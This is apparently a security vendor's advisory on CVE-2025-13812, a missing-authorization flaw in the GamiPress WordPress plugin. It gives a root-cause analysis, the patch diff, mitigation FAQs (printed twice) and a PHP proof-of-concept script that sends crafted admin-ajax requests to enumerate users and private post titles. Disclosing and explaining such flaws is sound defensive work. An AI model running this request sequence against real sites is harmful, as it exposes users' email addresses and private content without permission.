What is CVE-2025-13812?

CVE-2025-13812 is a medium severity vulnerability in the GamiPress plugin for WordPress, affecting versions up to 7.6.1. It allows authenticated users with Subscriber-level access and above to access sensitive information due to a missing authorization check in specific AJAX functions.

How does this vulnerability work?

The vulnerability arises from the absence of capability checks in the gamipress_ajax_get_posts and gamipress_ajax_get_users functions. Authenticated users can exploit this by sending crafted AJAX requests to retrieve user data and titles of private posts.

Who is affected by this vulnerability?

All WordPress sites using GamiPress versions 7.6.1 and below are affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the GamiPress plugin installed. If it is version 7.6.1 or earlier, your site is susceptible to this vulnerability.

How can I fix the vulnerability?

The vulnerability is patched in GamiPress version 7.6.2. Update your plugin to this version or later to mitigate the risk associated with CVE-2025-13812.

What does the risk level 'Medium' mean?

A medium risk level indicates that the vulnerability could lead to information exposure but does not allow for immediate system compromise or privilege escalation. It is important to address it to protect sensitive data.

What types of data can be exposed?

Exploitation of this vulnerability can lead to the exposure of user email addresses and titles of private posts. This information could facilitate phishing attacks or targeted exploitation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can authenticate as a low-privilege user and send a crafted request to the vulnerable AJAX endpoint. This request can enumerate users and retrieve private post titles, illustrating the risk of unauthorized data access.

What are AJAX functions in WordPress?

AJAX functions in WordPress allow for asynchronous requests to the server without reloading the page. They are commonly used in plugins to handle dynamic data operations, such as retrieving posts or user information.

What is a nonce in WordPress?

A nonce is a security token used in WordPress to protect against certain types of attacks, such as CSRF. It ensures that a request is coming from a legitimate source, but in this case, it was not sufficient to prevent unauthorized data access.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin right away, consider temporarily disabling the GamiPress plugin or restricting access to the admin area for lower-privileged users until the patch can be applied.

Where can I find more information about this vulnerability?

For more detailed information, you can refer to the official CVE database, security advisories from the GamiPress team, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13812: GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress <= 7.6.1 – Missing Authorization to Authenticated (Subscriber+) Information Exposure (gamipress)

CVE ID CVE-2025-13812

Plugin gamipress

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 7.6.1

Patched Version 7.6.2

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13812:
This vulnerability is a missing authorization flaw in the GamiPress WordPress plugin. The issue allows authenticated users with Subscriber-level permissions or higher to access sensitive data via two AJAX functions, leading to user enumeration and private post title disclosure.

Atomic Edge research identifies the root cause as the absence of a capability check in two AJAX handler functions. The vulnerable functions are `gamipress_ajax_get_posts` and `gamipress_ajax_get_users`, located in the file `gamipress/includes/ajax-functions.php`. Before the patch, these functions performed a nonce check via `check_ajax_referer` but did not verify if the current user possessed the required administrative capability. This allowed any authenticated user to pass the nonce check and proceed with the function’s data retrieval logic.

An attacker can exploit this by sending a crafted POST request to the WordPress admin AJAX endpoint. The target URL is `/wp-admin/admin-ajax.php`. The attacker must be logged in with any role, such as Subscriber. The required parameter is `action` with a value of either `gamipress_get_posts` or `gamipress_get_users`. The request must also include a valid `nonce` parameter, which is obtainable by the authenticated user, and a `q` parameter for the search query. This allows the attacker to enumerate users and retrieve private post titles.

The patch adds a mandatory capability check to both vulnerable functions. In the patched version of `ajax-functions.php`, lines 184-186 and 269-271, the code now includes the condition `if( ! current_user_can( gamipress_get_manager_capability() ) ) { return; }`. This function `gamipress_get_manager_capability()` typically returns a high-level capability like `manage_options`. The fix ensures that only users with plugin management privileges can execute these AJAX actions, effectively blocking lower-privileged users.

Successful exploitation leads to information exposure. Attackers can enumerate all WordPress users, including their email addresses, which facilitates phishing campaigns or targeted attacks. They can also retrieve the titles of private posts, potentially revealing confidential information. This data leak violates confidentiality but does not directly allow modification or privilege escalation.

Differential between vulnerable and patched code

Code Diff

--- a/gamipress/gamipress.php
+++ b/gamipress/gamipress.php
@@ -3,7 +3,7 @@
  * Plugin Name:     	GamiPress
  * Plugin URI:      	https://gamipress.com
  * Description:     	The most flexible and powerful gamification system for WordPress.
- * Version:         	7.6.1
+ * Version:         	7.6.2
  * Author:          	GamiPress
  * Author URI:      	https://gamipress.com/
  * Text Domain:     	gamipress
@@ -121,7 +121,7 @@
 	private function constants() {

 		// Plugin version
-		define( 'GAMIPRESS_VER', '7.6.1' );
+		define( 'GAMIPRESS_VER', '7.6.2' );

 		// Plugin file
 		define( 'GAMIPRESS_FILE', __FILE__ );
--- a/gamipress/includes/ajax-functions.php
+++ b/gamipress/includes/ajax-functions.php
@@ -182,6 +182,10 @@
     // Security check, forces to die if not security passed
     check_ajax_referer( 'gamipress_admin', 'nonce' );

+	if( ! current_user_can( gamipress_get_manager_capability() ) ) {
+		return;
+    }
+
 	// If no word query sent, initialize it
 	if ( ! isset( $_REQUEST['q'] ) ) {
 		$_REQUEST['q'] = '';
@@ -263,6 +267,10 @@
     // Security check, forces to die if not security passed
     check_ajax_referer( 'gamipress_admin', 'nonce' );

+	if( ! current_user_can( gamipress_get_manager_capability() ) ) {
+		return;
+    }
+
 	global $wpdb;

 	// Pull back the search string

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13812 - GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress <= 7.6.1 - Missing Authorization to Authenticated (Subscriber+) Information Exposure
<?php

// Configuration
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username = 'subscriber'; // Attacker's low-privilege username
$password = 'password'; // Attacker's password

// Step 1: Authenticate to WordPress and obtain cookies and a nonce.
// The nonce for 'gamipress_admin' is often available on front-end pages for logged-in users.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');

// First, perform a login to establish session. This is a simplified example.
// In a real scenario, you would POST to wp-login.php and handle redirects.
// For this PoC, we assume the attacker already has a valid session cookie.
// The script demonstrates the exploit request assuming valid auth cookies are in the jar.

// Step 2: Exploit the gamipress_ajax_get_users function to enumerate users.
$post_data = array(
    'action' => 'gamipress_get_users',
    'nonce' => 'GET_A_VALID_NONCE', // Replace with a nonce fetched from a page as an authenticated user.
    'q' => 'a' // Search query to fetch users. Can be iterated with different letters.
);

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    echo "Response for user enumeration:n";
    echo $response;
    echo "n";
}

// Step 3: Exploit the gamipress_ajax_get_posts function to get private post titles.
$post_data = array(
    'action' => 'gamipress_get_posts',
    'nonce' => 'GET_A_VALID_NONCE', // Same nonce as above.
    'q' => 'private', // Search query for posts.
    'post_type' => 'any' // Parameter to search all post types.
);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    echo "Response for post title retrieval:n";
    echo $response;
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-13812?
Overview of the vulnerability
CVE-2025-13812 is a medium severity vulnerability in the GamiPress plugin for WordPress, affecting versions up to 7.6.1. It allows authenticated users with Subscriber-level access and above to access sensitive information due to a missing authorization check in specific AJAX functions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the absence of capability checks in the gamipress_ajax_get_posts and gamipress_ajax_get_users functions. Authenticated users can exploit this by sending crafted AJAX requests to retrieve user data and titles of private posts.
Who is affected by this vulnerability?
Identifying vulnerable users
All WordPress sites using GamiPress versions 7.6.1 and below are affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the GamiPress plugin installed. If it is version 7.6.1 or earlier, your site is susceptible to this vulnerability.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is patched in GamiPress version 7.6.2. Update your plugin to this version or later to mitigate the risk associated with CVE-2025-13812.
What does the risk level 'Medium' mean?
Understanding severity ratings
A medium risk level indicates that the vulnerability could lead to information exposure but does not allow for immediate system compromise or privilege escalation. It is important to address it to protect sensitive data.
What types of data can be exposed?
Potential information leakage
Exploitation of this vulnerability can lead to the exposure of user email addresses and titles of private posts. This information could facilitate phishing attacks or targeted exploitation.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept shows how an attacker can authenticate as a low-privilege user and send a crafted request to the vulnerable AJAX endpoint. This request can enumerate users and retrieve private post titles, illustrating the risk of unauthorized data access.
What are AJAX functions in WordPress?
Understanding AJAX in plugins
AJAX functions in WordPress allow for asynchronous requests to the server without reloading the page. They are commonly used in plugins to handle dynamic data operations, such as retrieving posts or user information.
What is a nonce in WordPress?
Security measure in AJAX requests
A nonce is a security token used in WordPress to protect against certain types of attacks, such as CSRF. It ensures that a request is coming from a legitimate source, but in this case, it was not sufficient to prevent unauthorized data access.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin right away, consider temporarily disabling the GamiPress plugin or restricting access to the admin area for lower-privileged users until the patch can be applied.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official CVE database, security advisories from the GamiPress team, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations